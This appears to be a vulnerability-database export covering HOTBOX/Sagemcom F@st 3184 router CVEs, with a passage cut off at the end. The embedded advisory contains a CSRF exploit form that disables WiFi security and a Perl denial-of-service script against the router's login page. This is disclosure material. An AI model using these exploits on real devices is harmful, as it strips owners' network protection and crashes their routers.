"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 6.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.5,
"id": "CVE-2013-5220",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 6.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.5,
"id": "CNVD-2014-00014",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 6.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.5,
"id": "VHN-65222",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:A/AC:L/AU:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-5220",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2013-5220",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-00014",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201312-565",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-65222",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00014"
},
{
"db": "VULHUB",
"id": "VHN-65222"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005736"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-565"
},
{
"db": "NVD",
"id": "CVE-2013-5220"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "goform/login on the HOT HOTBOX router with software 2.1.11 allows remote attackers to cause a denial of service (device crash) via crafted HTTP POST data. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities:\n1. An Information-disclosure Vulnerability\n2. An Authentication-bypass vulnerability\n3. A Remote Denial-of-service Vulnerability\n4. A Directory-traversal Vulnerability\n5. An HTML-injection Vulnerability\n6. A Cross-site Request-forgery Vulnerability\nAn attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible\nSagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+\n| HOTBOX is the leading router/modem appliance of |\n| HOT Cable communication company in israel. |\n| The Appliance is manufactured by SAGEMCOM |\n| and carries the model name F@st 3184. |\n+------------------------------------------------------------------------------+\n| Title: HOTBOX Multiple Vulnerabilities |\n+--------------------+---------------------------------------------------------+\n| Release Date | 2013/09/09 |\n| Researcher | Oz Elisyan |\n+--------------------+---------------------------------------------------------+\n| System Affected | HOTBOX Router/Modem |\n| Versions Affected | 2.1.11 , possibly earlier |\n| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|\n| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, |\n| CVE-2013-5039 |\n| Vendor Patched | N/A |\n| Classification | 0-day |\n| Exploits | http://elisyan.com/hotboxDoS.pl, |\n| http://elisyan.com/hotboxCSRF.html |\n+--------------------+---------------------------------------------------------+\n\nVulnerabilities List -\n# Default WPS Pin\n# Authentication based on IP Address\n# DoS via crafted POST\n# Path/Directory Traversal\n# Script injection via DHCP request\n# No CSRF Token\n\nDemo -\nhttp://www.youtube.com/watch?v=CPlT09ZIj48\n\n\n\nCSRF EXPLOIT: \n\n\n\u003chtml\u003e\n \u003cform action=\u0027http://192.168.1.1/goform/wlanBasicSecurity\u0027 method=\u0027POST\u0027 id=1\u003e\n \u003cinput type=hidden name=\"WirelessMacAddr\" value=\"C0%3AAC%3A54%3AF8%3A67%3A58\" id=\"WirelessMacAddr\"\u003e\n \u003cinput type=hidden name=\"WirelessEnable1\" value=\"1\" id=\"WirelessEnable1\"\u003e\n\t\t\u003cinput type=hidden name=\"ServiceSetIdentifier1\" value=\"Elisyan\" id=\"ServiceSetIdentifier1\"\u003e\n\t\t\u003cinput type=hidden name=\"WirelessVendorMode\" value=\"3\" id=\"WirelessVendorMode\"\u003e\n\t\t\u003cinput type=hidden name=\"ChannelNumber1\" value=\"0\" id=\"ChannelNumber1\"\u003e\n\t\t\u003cinput type=hidden name=\"NBandwidth1\" value=\"20\" id=\"NBandwidth1\"\u003e\n\t\t\u003cinput type=hidden name=\"ClosedNetwork1\" value=\"0\" id=\"ClosedNetwork1\"\u003e\n\t\t\u003cinput type=hidden name=\"WifiSecurity\" value=\"0\" id=\"WifiSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"commitwlanBasicSecurity\" value=\"1\" id=\"commitwlanBasicSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"restoreWirelessDefaults1\" value=\"0\" id=\"restoreWirelessDefaults1\"\u003e\n\t\t\u003cinput type=hidden name=\"scanActions1\" value=\"0\" id=\"scanActions1\"\u003e\n\t\t\u003cinput type=hidden name=\"AutoSecurity1\" value=\"1\" id=\"AutoSecurity1\"\u003e\n\t\t\u003cinput type=hidden name=\"wpsActions1\" value=\"0\" id=\"wpsActions1\"\u003e\n\t\t\n\n \u003c/form\u003e\n\u003c/html\u003e\n\u003cscript\u003edocument.getElementById(1).submit();\u003c/script\u003e\n\n\n\nDENIAL OF SERVICE EXPLOIT:\n\nuse warnings;\nuse HTTP::Request::Common qw(POST);\nuse LWP::UserAgent;\n\n\n# Author: Oz Elisyan\n# Date: 3 September 2013\n# Affected Version: \u003c= 2.1.11\n\nprint \"# HOTBOX DoS PoC #\\n\\n\"\n\nunless ($ARGV[0]){\n\tprint \"Please Enter Valid Host Name.\\n\";\n\texit();\n}\n\nprint \"Sending Evil POST request...\\n\";\n\nmy $HOST = $ARGV[0];\nmy $URL = \"http://$HOST/goform/login\";\nmy $PostData = \"loginUsername=aaaloginPassword=aaa\"\nmy $browser = LWP::UserAgent-\u003enew();\nmy $req = HTTP::Request-\u003enew(POST =\u003e $URL);\n$req-\u003econtent_type(\"application/x-www-form-urlencoded\");\n$req-\u003econtent($PostData);\nmy $resp = $browser-\u003erequest($req);\n\nprint \"Done.\";\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-5220"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005736"
},
{
"db": "CNVD",
"id": "CNVD-2014-00014"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "VULHUB",
"id": "VHN-65222"
},
{
"db": "PACKETSTORM",
"id": "123901"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-65222",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-65222"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-5220",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "123901",
"trust": 3.2
},
{
"db": "BID",
"id": "63550",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005736",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201312-565",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-00014",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "29518",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-65222",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00014"
},
{
"db": "VULHUB",
"id": "VHN-65222"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005736"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-565"
},
{
"db": "NVD",
"id": "CVE-2013-5220"
}
]
},
"id": "VAR-201312-0376",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00014"
},
{
"db": "VULHUB",
"id": "VHN-65222"
}
],
"trust": 1.325
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00014"
}
]
},
"last_update_date": "2025-04-11T22:48:26.705000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.hot.net.il/heb/Main/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005736"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-65222"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005736"
},
{
"db": "NVD",
"id": "CVE-2013-5220"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/123901/hotbox-2.1.11-csrf-traversal-denial-of-service.html"
},
{
"trust": 2.4,
"url": "http://www.youtube.com/watch?v=cplt09zij48"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5220"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5220"
},
{
"trust": 0.3,
"url": "http://www.sagemcom.com/index.php?id=1760\u0026l=25"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2013/nov/17"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5038"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5220"
},
{
"trust": 0.1,
"url": "http://$host/goform/login\";"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/goform/wlanbasicsecurity\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5037"
},
{
"trust": 0.1,
"url": "http://elisyan.com/hotboxcsrf.html"
},
{
"trust": 0.1,
"url": "http://elisyan.com/hotboxdos.pl,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5039"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5218"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00014"
},
{
"db": "VULHUB",
"id": "VHN-65222"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005736"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-565"
},
{
"db": "NVD",
"id": "CVE-2013-5220"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-00014"
},
{
"db": "VULHUB",
"id": "VHN-65222"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005736"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-565"
},
{
"db": "NVD",
"id": "CVE-2013-5220"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00014"
},
{
"date": "2013-12-30T00:00:00",
"db": "VULHUB",
"id": "VHN-65222"
},
{
"date": "2013-09-09T00:00:00",
"db": "BID",
"id": "63550"
},
{
"date": "2014-01-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005736"
},
{
"date": "2013-11-04T13:03:33",
"db": "PACKETSTORM",
"id": "123901"
},
{
"date": "2013-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-565"
},
{
"date": "2013-12-30T04:53:07.350000",
"db": "NVD",
"id": "CVE-2013-5220"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00014"
},
{
"date": "2013-12-30T00:00:00",
"db": "VULHUB",
"id": "VHN-65222"
},
{
"date": "2013-09-09T00:00:00",
"db": "BID",
"id": "63550"
},
{
"date": "2014-01-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005736"
},
{
"date": "2013-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-565"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2013-5220"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "specific network environment",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-565"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "HOT HOTBOX Router Software goform/login Service disruption in (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005736"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-565"
}
],
"trust": 0.6
}
}
CVE-2013-5220 (GCVE-0-2013-5220)
Vulnerability from nvd – Published: 2013-12-30 02:00 – Updated: 2024-08-06 17:06- n/a
| URL | Tags |
|---|---|
| http://www.youtube.com/watch?v=CPlT09ZIj48 | x_refsource_MISC |
| http://packetstormsecurity.com/files/123901/HOTBO… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:06:52.402Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-09-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "goform/login on the HOT HOTBOX router with software 2.1.11 allows remote attackers to cause a denial of service (device crash) via crafted HTTP POST data."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-12-30T01:57:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-5220",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "goform/login on the HOT HOTBOX router with software 2.1.11 allows remote attackers to cause a denial of service (device crash) via crafted HTTP POST data."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-5220",
"datePublished": "2013-12-30T02:00:00.000Z",
"dateReserved": "2013-08-15T00:00:00.000Z",
"dateUpdated": "2024-08-06T17:06:52.402Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-5219 (GCVE-0-2013-5219)
Vulnerability from nvd – Published: 2013-12-30 02:00 – Updated: 2024-08-06 17:06- n/a
| URL | Tags |
|---|---|
| http://www.youtube.com/watch?v=CPlT09ZIj48 | x_refsource_MISC |
| http://packetstormsecurity.com/files/123901/HOTBO… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:06:52.338Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-09-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Directory traversal vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to read arbitrary files via a .. (dot dot) in a URI, as demonstrated by a request for /etc/passwd."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-12-30T01:57:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-5219",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Directory traversal vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to read arbitrary files via a .. (dot dot) in a URI, as demonstrated by a request for /etc/passwd."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-5219",
"datePublished": "2013-12-30T02:00:00.000Z",
"dateReserved": "2013-08-15T00:00:00.000Z",
"dateUpdated": "2024-08-06T17:06:52.338Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-5218 (GCVE-0-2013-5218)
Vulnerability from nvd – Published: 2013-12-30 02:00 – Updated: 2024-08-06 17:06- n/a
| URL | Tags |
|---|---|
| http://www.youtube.com/watch?v=CPlT09ZIj48 | x_refsource_MISC |
| http://packetstormsecurity.com/files/123901/HOTBO… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:06:52.356Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-09-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to inject arbitrary web script or HTML via a crafted DHCP Host Name option, which is not properly handled during rendering of the DHCP table in wlanAccess.asp."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-12-30T01:57:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-5218",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to inject arbitrary web script or HTML via a crafted DHCP Host Name option, which is not properly handled during rendering of the DHCP table in wlanAccess.asp."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-5218",
"datePublished": "2013-12-30T02:00:00.000Z",
"dateReserved": "2013-08-15T00:00:00.000Z",
"dateUpdated": "2024-08-06T17:06:52.356Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-5039 (GCVE-0-2013-5039)
Vulnerability from nvd – Published: 2013-12-30 02:00 – Updated: 2024-08-06 16:59- n/a
| URL | Tags |
|---|---|
| http://www.youtube.com/watch?v=CPlT09ZIj48 | x_refsource_MISC |
| http://packetstormsecurity.com/files/123901/HOTBO… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:59:41.307Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-09-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-12-30T01:57:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-5039",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
